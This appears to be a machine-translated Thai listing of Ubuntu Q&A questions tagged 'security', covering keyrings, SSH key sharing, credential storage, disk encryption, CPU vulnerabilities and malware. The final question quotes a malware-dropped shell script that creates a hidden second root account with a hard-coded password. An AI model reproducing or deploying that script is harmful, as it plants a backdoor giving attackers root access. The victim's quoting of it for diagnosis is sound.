คำถามติดแท็ก security

ตามที่เป็นอยู่ในปัจจุบันคำถามนี้ไม่เหมาะสำหรับรูปแบบคำถาม & คำตอบของเรา เราคาดหวังว่าคำตอบจะได้รับการสนับสนุนจากข้อเท็จจริงการอ้างอิงหรือความเชี่ยวชาญ แต่คำถามนี้อาจเรียกร้องให้มีการอภิปรายโต้แย้งโต้แย้งหรือการอภิปรายเพิ่มเติม หากคุณรู้สึกว่าคำถามนี้สามารถปรับปรุงและเปิดใหม่ได้โปรดไปที่ศูนย์ช่วยเหลือเพื่อขอคำแนะนำ ปิดให้บริการใน9 ปีที่ผ่านมา ฉันควรติดตั้งบางอย่างเช่น gufw หรือไม่

13 security  firewall 

ความแตกต่างระหว่างค่าเริ่มต้นและการเข้าสู่ระบบคืออะไร? และสิ่งที่ไม่พวงกุญแจปริยายหมายถึง? เมื่อฉันเรียกใช้แอปพลิเคชั่นบางตัว (Emphaty ฯลฯ ) หน้าต่าง Unlock Keyring จะเปิดใช้งานก่อนจากนั้นจะต้องใช้รหัสผ่านของฉัน ทำไม? นี่เป็นภาพหน้าจอเมื่อฉันเรียกใช้ Emphaty ทำไมมันต้องมีรหัสผ่าน? มันเป็นเพียงผู้ส่งสาร มันทำให้ฉันบ้า ฉันสามารถค้นหาหน้าต่างนี้ได้ ฉันเดาว่า Windows นี้สามารถให้ทางออกแก่ฉันได้ ก่อนที่จะลองแก้ไขบางสิ่งฉันต้องการทราบเกี่ยวกับสิ่งที่พวกเขาทำ กรุณาอธิบายให้ฉัน PS รหัสผ่านเข้าสู่ระบบของฉันไม่เท่ากับรหัสผ่านเริ่มต้นในขณะนี้

13 security  password  gnome-keyring 

ฉันต้องการ Software Center, Update Manager และแอปพลิเคชั่นการจัดการระบบอื่น ๆ ให้ทำงานโดยไม่ต้องขอรหัสผ่าน (เช่นเดียวกับ sudo หากกำหนดค่าด้วย NOPASSWD) แต่ขอการยืนยันแทนหรือแม้แต่ไม่มีการยืนยันใด ๆ ในเวลาเดียวกันฉันไม่ต้องการใช้รหัสผ่านของผู้ใช้เลย สามารถเข้าถึงได้หรือไม่

13 security  sudo  password  xubuntu  policykit 

ฉันมีเพื่อนที่ฉันเชื่อใจมากพอที่จะให้ ssh เข้าถึงเซิร์ฟเวอร์ของฉัน ด้วยเหตุนี้ฉันได้สร้างบัญชีผู้ใช้สำหรับเขาแล้ว กล่องนี้สามารถเข้าถึงได้โดยการตรวจสอบคีย์เท่านั้นไม่ใช่รหัสผ่าน ฉันได้สร้างรหัสส่วนตัวสำหรับบัญชีนั้น แต่ถ้าฉันส่งให้เขาทางอีเมลเราก็จะเสียจุดสำคัญในการรักษาความปลอดภัย อะไรคือวิธีที่ดีที่สุดในการให้เขาเข้าถึงบัญชีนี้โดยไม่ต้องใช้วิธีการยืนยันกลับด้วยรหัสผ่าน? ปัญหาเพิ่มเติม: เขาอยู่ในกล่อง Windows แต่ติดตั้ง PuTTY ได้ง่าย

13 security  ssh 

My Update Manager ได้รับการตั้งค่าให้ดาวน์โหลดและปล่อยการปรับปรุงความปลอดภัยในเบื้องหลัง ดังนั้นจะไม่มีการแสดงบันทึกประจำรุ่นอีกต่อไป ฉันสงสัยว่ามีวิธีอ่านบันทึกประจำรุ่นในภายหลังหรือไม่ ฉันจะทราบได้อย่างไรว่ามีการติดตั้งการอัปเดตใดบ้างเมื่อเร็ว ๆ นี้และข้อบกพร่องใดที่ได้รับการแก้ไข

13 updates  update-manager  security 

ฉันมีสคริปต์ทุบตีที่รับรองความถูกต้องของบริการโดยอัตโนมัติโดยใช้ชื่อผู้ใช้และรหัสผ่านของฉัน ข้อมูลประจำตัวจะถูกเก็บไว้เป็นข้อความธรรมดาภายในสคริปต์ ฉันควรใช้ความระมัดระวังอย่างไรในการจัดเก็บข้อมูลรับรองเหล่านี้อย่างปลอดภัยที่สุดในขณะที่ยังอนุญาตให้เข้าถึงสคริปต์ได้ จุดชี้แจง: ฉันเข้าใจว่าควรใช้วิธีการรับรองความถูกต้องอื่น ๆ แทน ฉันยังต้องการทราบว่าต้องทำอย่างไรในกรณีที่การตรวจสอบรหัสผ่านเป็นเพียงตัวเลือกเดียว การไม่เก็บรหัสผ่านเลยไม่ใช่คำตอบที่ยอมรับได้ที่นี่ ฉันถามเกี่ยวกับกรณีที่สคริปต์ต้องมีการเข้าถึงรหัสผ่านแบบอัตโนมัติ

13 security  password  scripts  automation  authentication 

ฉันอยากรู้ว่าการเข้ารหัสดิสก์เต็มรูปแบบของ Ubuntu ทำงานอย่างไรภายใต้ประทุน นี่คือตัวอย่าง: พิจารณาสตริงต่อไปนี้เป็นเนื้อหาของดิสก์ทั้งหมด: hello world หลังจากใช้วิธีการเข้ารหัสบางอย่างแล้วมันจะมีลักษณะดังนี้: (ฉันใช้ Caesar cipher กับการเปลี่ยน +1 สำหรับตัวอย่างนี้เช่น A → B; B → C ... ) ifmmp xpsme อย่างที่ฉันเข้าใจเมื่อคอมพิวเตอร์ถูกปิดเนื้อหาของไดรฟ์จะเป็นสตริงด้านบน แต่เมื่อมันถูกเปิดใช้งานอีกครั้ง Ubuntu จำเป็นต้องมีเนื้อหาของมันที่จะกลับมาอีกครั้งhello worldเพื่อให้สามารถบู๊ตได้สำเร็จ สิ่งที่ฉันไม่ได้รับจริงๆคือในโลกแห่งความจริงเนื้อหาของดิสก์นั้นมีมากขึ้นและอัลกอริธึมการเข้ารหัสมีความซับซ้อนมากขึ้นและฉันพบว่ามันยากสำหรับคอมพิวเตอร์ที่จะเข้ารหัส / ถอดรหัสทั้งหมดในเวลาเพียงไม่กี่วินาที (ใช้เวลาไม่นานในการบูตหรือปิดระบบ) เป็นไปได้อย่างไร?

13 security  encryption  dmcrypt 

ค่าเริ่มต้นปัจจุบันสำหรับบัญชีหลักในการมี/etc/passwdroot:x:0:0:root:/root:/bin/bash ทำไมไม่ตั้งค่าให้root:x:0:0:root:/root:/usr/sbin/nologin?

12 command-line  security  root 

ช่องโหว่ Meltdown และ Specter สามารถส่งผลกระทบต่อคอมพิวเตอร์ที่มีโฮมไดเรกทอรีเข้ารหัสและการใช้บริการ VPN ได้หรือไม่ ในคำอื่น ๆ แฮกเกอร์จะยังคงสามารถขโมยรหัสผ่านเมื่อมีการใช้การส่งสัญญาณเข้ารหัสและบริการ VPN หรือไม่

12 security  vpn 

Intel เผยแพร่เมื่อเร็ว ๆ ช่องโหว่ความปลอดภัยของพวกเขาอย่างรุนแรงในเว็บไซต์ ตระกูลโปรเซสเซอร์จำนวนมากได้รับผลกระทบ การใช้เครื่องมือของแล็ปท็อปของฉันถูกระบุว่าได้รับผลกระทบ แนวคิดใดบ้างที่จะบรรเทาปัญหาดังกล่าวใน Ubuntu ขอบคุณล่วงหน้า

12 security  intel 

ดังนั้นฉันจึงพยายามที่จะติดตั้งบางสิ่งบางอย่างในไวน์เมื่อฉันพบข้อเสนอแนะเพื่อใช้ sudo เพื่อรับสิทธิ์ผู้ดูแลระบบ นั่นคือเมื่อฉันได้รับข้อความข้างต้น ~/.wine is not owned by you อ่านฉันรู้อย่างรวดเร็วว่าทำไมข้อความนี้ปรากฏขึ้นและพยายามที่จะsudoไวน์ที่ไม่ดีจริงๆ IDEA ดังนั้นฉันไม่ได้ทำอะไรเพิ่มเติมและไม่ได้ตั้งใจจะsudoดื่มไวน์อีกเลย คำถามของฉันคือเพราะฉันได้รับบล็อกนี้ฉันปลอดภัยหรือไม่ หรือฉันจำเป็นต้องลบไวน์ทั้งหมดเพราะฉันทำหรือไม่

12 wine  sudo  security  malware 

เป็นความจริงหรือไม่ว่าไดรฟ์ Ubuntu USB ที่สามารถบู๊ตได้นั้นไม่อนุญาตให้เขียนข้อมูลใด ๆ ลงในฮาร์ดไดรฟ์ของคอมพิวเตอร์ ถ้าเป็นเช่นนั้นคอมพิวเตอร์ที่มีไดรฟ์ SSD จะเหมือนถูกทิ้งไว้โดยไม่มีร่องรอยของเซสชัน USB ที่สามารถบู๊ตได้หรือไม่

12 boot  usb  hard-drive  security  drive 

ฉันเพิ่งเจอสิ่งที่ฉันสงสัยอาจเป็นปัญหาด้านความปลอดภัยที่สำคัญกับ terminal Linux ฉันพยายามติดตั้ง g ++ 5.0 sudo apt-get install g++ 5.0ผมมือใหม่ลินุกซ์ดังนั้นฉันเพิ่งพิมพ์ แทนที่จะเพียงแค่ส่งคืนข้อผิดพลาดหรือบางสิ่งมันก็ติดตั้ง Virtual Box! หากฉันพยายามติดตั้งสิ่งหนึ่งจากเครื่องเทอร์มินัลและติดตั้งสิ่งที่แตกต่างอย่างสิ้นเชิงนั่นหมายความว่ามันอาจเกิดขึ้นกับสิ่งอื่นมัลแวร์หรือไม่ ทำไมจะต้องติดตั้ง Virtual Box เมื่อฉันพิมพ์บางอย่างที่แตกต่างออกไปโดยสิ้นเชิง?

12 command-line  apt  software-installation  virtualbox  security 

ฉันมีรหัสผ่านบนคอมพิวเตอร์ Ubuntu แต่ถ้าฉันคลิกลูกศรที่อยู่ถัดจากลงชื่อเข้าใช้ฉันจะได้รับบัญชีของฉัน ฉันต้องการปิดการใช้งานนี้เพราะพี่น้องของฉันได้ไปและฉันไม่ต้องการให้พวกเขา นอกจากนี้ฉันต้องการปิดใช้งานส่วนเซสชันแขกของฉัน แต่ฉันไม่ทราบด้วย ช่วยด้วย?

12 security 

ฉันค่อนข้างแน่ใจว่าแล็ปท็อป Ubuntu 13.10 ของฉันติดมัลแวร์บางประเภท ทุกครั้งที่ฉันพบกระบวนการ / lib / sshd (เป็นเจ้าของโดย root) ทำงานและใช้ cpu มากมาย ไม่ใช่เซิร์ฟเวอร์ sshd ที่รัน / usr / sbin / sshd ไบนารีมีสิทธิ์ --wxrw-rwt และสร้างและวางไข่สคริปต์ในไดเรกทอรี / lib ชื่อล่าสุดคือ 13959730401387633604 และทำสิ่งต่อไปนี้ #!/bin/sh exec 1>/dev/null exec 2>/dev/null useradd -g 0 -u 0 -o gusr echo gusr:chaonimabi123456123 | chpasswd ผู้ใช้ gusr ถูกสร้างขึ้นโดยมัลแวร์อย่างอิสระจากนั้น …

12 security  malware